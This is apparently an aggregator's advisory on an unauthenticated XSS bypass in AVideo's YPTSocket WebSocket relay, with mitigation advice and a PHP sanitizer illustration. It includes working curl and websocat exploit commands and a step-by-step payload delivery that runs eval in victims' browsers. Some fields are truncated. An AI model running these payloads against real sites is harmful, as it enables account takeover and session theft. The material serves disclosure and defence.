AVideo YPTSocket, Incomplete Mitigation Bypass, GHSA-gph2-j4c9-vhhr (Critical)


How the mentioned CVE works:

The prior fix for GHSA-gph2-j4c9-vhhr stripped autoEvalCodeOnHTML only from $json['msg'], and only when that field is an array. However, the WebSocket relay function msgToResourceId() prioritizes $msg['json'] over $msg['msg'] when constructing the outbound message. An unauthenticated attacker first requests a WebSocket token from /plugin/YPTSocket/getWebSocket.json.php; no authentication is required. The token grants a browser-mode connection (sentFrom='browser', isCommandLineInterface=0). The attacker connects to wss://target:2053 with that token and sends a JSON message shaped as {"msg": "x", "json": {"autoEvalCodeOnHTML": "alert(1)"}, "to_users_id": }. Because $json['msg'] is the scalar string "x", the conditional if (is_array($json['msg'] ?? null)) evaluates to false, so the stripping code is bypassed entirely. The relay then sees !empty($msg['json']) and assigns $obj['msg'] = $msg['json'], carrying the malicious autoEvalCodeOnHTML verbatim. The msgToUsers_id() function uses the attacker-supplied to_users_id to deliver the message to any logged-in user with an active tab. On the client side, plugin/YPTSocket/script.js:573-575 calls eval(json.msg.autoEvalCodeOnHTML), executing arbitrary JavaScript in the victim's origin. The same token can enumerate active users via getClientsList, allowing mass exploitation.

DailyCVE form:

Platform: AVideo YPTSocket
Version: Commit c08694bf6
Vulnerability: Unauthenticated XSS via
Severity: Critical
Date: 2026-05-05

Prediction: Patch within 30d

What Undercode Say:

# Enumerate active users (unauthenticated)
curl -sk 'https://target/plugin/YPTSocket/getWebSocket.json.php' | jq -r '.webSocketToken'
TOKEN="<extracted_token>"
echo '{"msg":"getClientsList","webSocketToken":"'"$TOKEN"'"}' | websocat -n "wss://target:2053?webSocketToken=$TOKEN&isCommandLine=0"
# Exploit delivery to victim_id=2
echo '{"msg":"x","json":{"autoEvalCodeOnHTML":"alert(document.domain)"},"to_users_id":2,"webSocketToken":"'"$TOKEN"'"}' | websocat -n "wss://target:2053?webSocketToken=$TOKEN&isCommandLine=0"

Exploit:

1. GET /plugin/YPTSocket/getWebSocket.json.php → obtain token.

2. WebSocket connect with token & isCommandLine=0.

3. Send payload: {"msg":"x", "json":{"autoEvalCodeOnHTML":""}, "to_users_id":, "webSocketToken":}.

4. Victim’s browser executes eval() on autoEvalCodeOnHTML.

Protection from this CVE

  • Patch Message.php and MessageSQLiteV2.php: strip autoEvalCodeOnHTML from both $json['msg'] and $json['json'] recursively, plus top-level.
  • Remove eval() in script.js or gate behind a signed server field.
  • Authenticate WebSocket token issuance and validate to_users_id against sender’s session.
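To make the first protection item concrete, here is an added illustration (not code from AVideo's Message.php or MessageSQLiteV2.php) that places the incomplete array-only check beside a recursive stripper covering msg, json and the top level; the function names and the relay stub are assumptions.

```php
<?php
// Added illustration, not AVideo's own code. Function names are hypothetical.

// Recursively drop any autoEvalCodeOnHTML key from a decoded message, so no
// branch of the payload (msg, json, or top level) can reach the client eval().
function stripAutoEval($value) {
    if (!is_array($value)) {
        return $value;
    }
    unset($value['autoEvalCodeOnHTML']);
    foreach ($value as $k => $v) {
        $value[$k] = stripAutoEval($v);
    }
    return $value;
}

// The incomplete mitigation as described: only looks at msg, and only when it is an array.
function sanitizeIncomplete(array $json): array {
    if (is_array($json['msg'] ?? null)) {
        unset($json['msg']['autoEvalCodeOnHTML']);
    }
    return $json;
}

// Hardened version: sanitize the entire decoded message before it is relayed.
function sanitizeComplete(array $json): array {
    return stripAutoEval($json);
}

// Mirror of the relay preference (json over msg), as a stub; the outbound
// payload is whatever ends up in $obj['msg'].
function buildOutbound(array $msg): array {
    $obj = [];
    $obj['msg'] = !empty($msg['json']) ? $msg['json'] : ($msg['msg'] ?? '');
    return $obj;
}

// Does the outbound message still carry an eval'able field?
function outboundCarriesEval(array $json, callable $sanitizer): bool {
    $obj = buildOutbound($sanitizer($json));
    return is_array($obj['msg']) && isset($obj['msg']['autoEvalCodeOnHTML']);
}

// Constructed sample shaped like the bypass message in the advisory.
$sample = json_decode('{"msg":"x","json":{"autoEvalCodeOnHTML":"alert(1)"},"to_users_id":2}', true);

var_dump(outboundCarriesEval($sample, 'sanitizeIncomplete'));
var_dump(outboundCarriesEval($sample, 'sanitizeComplete'));
```

Running the script shows the first sanitizer letting the field through to the outbound message and the second removing it; the same stripper should be applied to the top-level message, not just to the msg branch.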

Impact

  • Unauthenticated RCE‑like XSS in any logged‑in user’s session (admin included).
  • Full account takeover, session exfiltration, and arbitrary admin actions via same‑origin XHR.
  • Mass compromise using getClientsList enumeration.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
